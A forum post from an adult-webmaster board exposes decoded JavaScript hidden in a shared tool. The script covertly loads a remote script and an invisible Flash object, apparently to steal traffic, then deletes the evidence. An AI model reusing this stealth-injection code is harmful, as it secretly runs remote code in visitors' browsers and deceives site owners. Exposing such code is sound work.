03-17-2011, 03:47 PM
|
|
Confirmed User
Industry Role:
Join Date: Aug 2005
Location: YUROP
Posts: 8,606
|
Quote:
Originally Posted by nation-x
I wonder how many idiots you will get to send traffic to your tube galleries.
Nice Tool Here: http://www.strictly-software.com/unpack-javascript.aspx
Code:
var url = '';
function LoadUrls() {
var fileref = document.createElement('script');
fileref.setAttribute("type", "text/javascript");
fileref.setAttribute("id", "rjs");
fileref.setAttribute("src", "http://www.pornotubes.info/stats/r.php");
var bodyElement = document.getElementsByTagName('body')[0];
bodyElement.appendChild(fileref);
setTimeout("RemoveElement('rjs');", 3000)
}
function CreateStats() {
var stats = '<object width="1" height="1" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0"><param name="movie" value="' + url + '"><param name="wmode" value="transparent"><embed src="' + url + '" quality="high" type="application/x-shockwave-flash" allowfullscreen="false" allowSriptAccess="always" allownetworking="all" wmode="transparent" width="1" height="1"></embed></object>';
var statsdiv = document.createElement('div');
var divId = 'stats';
statsdiv.setAttribute('id', divId);
statsdiv.innerHTML = stats;
var bodyElement = document.getElementsByTagName('body')[0];
bodyElement.appendChild(statsdiv);
setTimeout("RemoveElement('stats');", 5000)
}
function RemoveElement(id) {
var d = document.getElementById(id);
d.parentNode.removeChild(d)
}
function createCookie(name, value, days) {
if (days) {
var date = new Date();
date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
var expires = "; expires=" + date.toGMTString()
} else var expires = "";
document.cookie = name + "=" + value + expires + "; path=/"
}
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for (var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ' ') c = c.substring(1, c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length)
}
return null
}
if (readCookie('rotation_ok') != "1") {
setTimeout("LoadUrls();", 1000);
setTimeout("CreateStats();", 4100);
createCookie('rotation_ok', "1", 1)
}
|
nice find
|
|
|